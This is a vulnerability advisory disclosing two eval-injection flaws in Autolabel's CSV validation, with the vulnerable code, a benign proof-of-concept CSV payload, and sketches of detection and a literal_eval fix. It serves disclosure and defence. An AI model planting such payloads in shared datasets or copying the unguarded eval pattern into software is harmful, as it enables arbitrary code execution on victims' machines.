Autolabel
Vulnerability Report

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

CVE Number

CVE-2024-27320

Summary

An arbitrary code execution vulnerability exists inside the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. The vulnerability requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. The vulnerability allows an attacker to run arbitrary Python code on the machine the CSV file is loaded on because of the use of an unprotected eval function.

Products Impacted

This vulnerability is present in Autolabel v0.0.8 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
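
The 7.8 score can be reproduced from the vector above. The following is a minimal sketch of the base-score arithmetic, assuming the vector is scored under CVSS v3.1 (the report does not state the version). The metric weights and the rounding rule come from that specification; the names `WEIGHTS`, `roundup`, and `base_score` are illustrative only.

```python
import math

# CVSS v3.1 weights for the metric values that appear in this vector
# (assumption: v3.1 scoring, scope unchanged).
WEIGHTS = {
    "AV": {"L": 0.55},
    "AC": {"L": 0.77},
    "PR": {"N": 0.85},
    "UI": {"R": 0.62},
    "C": {"H": 0.56},
    "I": {"H": 0.56},
    "A": {"H": 0.56},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Base score for an unchanged-scope vector covered by WEIGHTS."""
    metrics = dict(part.split(":") for part in vector.split("/"))
    if metrics.get("S") != "U":
        raise ValueError("this sketch only handles S:U")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 7.8
```

Impact is roughly 5.87 and exploitability roughly 1.83; their sum, about 7.71, rounds up to 7.8.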

CWE Categorization

CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)

Details

To exploit this vulnerability, an attacker would create a malicious CSV file and share it as a dataset with the victim, who would load it for a classification task using Autolabel. The vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file (shown below).

    def validate(self, value: str):
        """Validate classification

        A classification label(ground_truth) could either be a list or string
        """
        # TODO: This can be made better
        if value.startswith("[") and value.endswith("]"):
            try:
                seed_labels = eval(value)
                if not isinstance(seed_labels, list):
                    raise
                unmatched_label = set(seed_labels) - self.labels_set
                if len(unmatched_label) != 0:
                    raise ValueError(
                        f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                    )
            except SyntaxError:
                raise
        else:
            if value not in self.labels_set:
                raise ValueError(
                    f"labels: '{value}' not in prompt/labels provided in config "
                )
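
The bracket check is the only gate in front of eval, and it constrains the first and last characters of the value rather than the expression between them. The following is a minimal sketch of that behaviour outside Autolabel. `passes_bracket_gate` and `record` are hypothetical names introduced for illustration, and the payload is a harmless stand-in that only appends to a list.

```python
calls = []


def record(message: str) -> str:
    """Harmless stand-in for attacker-controlled code: notes that it ran."""
    calls.append(message)
    return message


def passes_bracket_gate(value: str) -> bool:
    """The same test the validate function applies before calling eval."""
    return value.startswith("[") and value.endswith("]")


# A list comprehension starts with "[" and ends with "]", so it passes the gate.
payload = "[record('executed') for _ in ['a']]"

if passes_bracket_gate(payload):
    # eval runs the comprehension and therefore the call inside it.
    # Explicit globals are passed only to keep this sketch self-contained.
    result = eval(payload, {"record": record})

print(result)  # ['executed']
print(calls)   # ['executed']
```

The result is a real list, so the isinstance check that follows eval in the original function would also pass; by then the embedded call has already run.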

When the user loads the malicious CSV file, the label_column value of each row is passed to the validate function of the class selected by the task_type attribute. If the value is wrapped in brackets “[]”, it is passed to eval inside the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. This allows arbitrary code execution on the victim’s device. An example configuration and an example malicious CSV are shown below.

from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "classification",  # classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo"  # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [  # list of labels to choose from
            "label",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)

example_config.py

example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]

example.csv
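
The label cell in example.csv can be inspected without running it. The following sketch uses only the standard library: it reads the CSV content with csv.DictReader and walks the cell's syntax tree with ast, showing that the cell is a list comprehension containing a function call rather than a list literal. The helper name `describe_label_cell` is hypothetical.

```python
import ast
import csv
import io

# Contents of example.csv; the raw string keeps the backslashes literal,
# exactly as they appear in the file.
CSV_TEXT = r"""example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
"""


def describe_label_cell(value: str) -> dict:
    """Parse (never execute) a label cell and summarise its syntax tree."""
    tree = ast.parse(value, mode="eval")
    return {
        "top_level": type(tree.body).__name__,
        "contains_call": any(isinstance(node, ast.Call) for node in ast.walk(tree)),
    }


rows = list(csv.DictReader(io.StringIO(CSV_TEXT)))
label = rows[0]["label"]

print(describe_label_cell(label))
# {'top_level': 'ListComp', 'contains_call': True}
print(describe_label_cell("['toxic', 'not toxic']"))
# {'top_level': 'List', 'contains_call': False}
```

A benign multi-label cell parses to a plain List node with no calls, which is the only shape the validator needs to accept.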

Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class

CVE Number

CVE-2024-27321

Summary

An arbitrary code execution vulnerability exists inside the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file. The vulnerability requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. The vulnerability allows an attacker to run arbitrary Python code on the machine the CSV file is loaded on because of the use of an unprotected eval function.

Products Impacted

This vulnerability is present in Autolabel v0.0.8 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)

Details

To exploit this vulnerability, an attacker would create a malicious CSV file and share it as a dataset with the victim, who would load it for a multilabel classification task using Autolabel. The vulnerability exists in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file (shown below).

    def validate(self, value: str):
        if value.startswith("[") and value.endswith("]"):
            try:
                seed_labels = eval(value)
                if not isinstance(seed_labels, list):
                    raise ValueError(
                        f"value: '{value}' is not a list of labels as expected"
                    )
                unmatched_label = set(seed_labels) - self.labels_set
                if len(unmatched_label) != 0:
                    raise ValueError(
                        f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                    )
            except SyntaxError:
                raise
        else:
            # TODO: split by delimiter specified in config and validate each label
            pass

When the user loads the malicious CSV file, the label_column value of each row is passed to the validate function of the class selected by the task_type attribute. If the value is wrapped in brackets “[]”, it is passed to eval inside the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. This allows arbitrary code execution on the victim’s device. An example configuration and an example malicious CSV are shown below:



from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "multilabel_classification",  # classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo"  # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [  # list of labels to choose from
            "label",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)

example_config.py



example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]

example.csv
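
One common way to remove this class of bug is to parse the cell as a literal instead of evaluating it. The following is a sketch under that assumption and is not the vendor's fix: `SafeLabelListValidate` is a hypothetical stand-in for the validator classes shown in this report, and the standard library's ast.literal_eval is swapped in for eval.

```python
import ast


class SafeLabelListValidate:
    """Hypothetical stand-in for the validator classes; not Autolabel code."""

    def __init__(self, labels):
        self.labels_set = set(labels)

    def validate(self, value: str) -> None:
        if value.startswith("[") and value.endswith("]"):
            try:
                # literal_eval accepts only Python literals; calls and
                # comprehensions raise ValueError instead of being run.
                seed_labels = ast.literal_eval(value)
            except (ValueError, SyntaxError, TypeError) as exc:
                raise ValueError(f"value: '{value}' is not a list literal") from exc
            if not isinstance(seed_labels, list) or not all(
                isinstance(label, str) for label in seed_labels
            ):
                raise ValueError(f"value: '{value}' is not a list of string labels")
            unmatched = set(seed_labels) - self.labels_set
            if unmatched:
                raise ValueError(f"labels: '{unmatched}' not in configured labels")
        elif value not in self.labels_set:
            raise ValueError(f"labels: '{value}' not in configured labels")


validator = SafeLabelListValidate(["toxic", "not toxic"])
validator.validate("['toxic', 'not toxic']")  # accepted, returns None

try:
    validator.validate("[print('code execution') for a in ['a']]")
except ValueError as err:
    print("rejected:", err)
```

The payload from example.csv is rejected before any of it executes, while well-formed label lists are still checked against the configured label set.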

Timeline

July 8, 2024: Reached out to multiple administrators through their communication channel

September 6, 2024: Final attempt to reach out to vendor prior to public disclosure date

September 12, 2024: Public disclosure

Researcher: Leo Ring, Security Research Intern, HiddenLayer
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer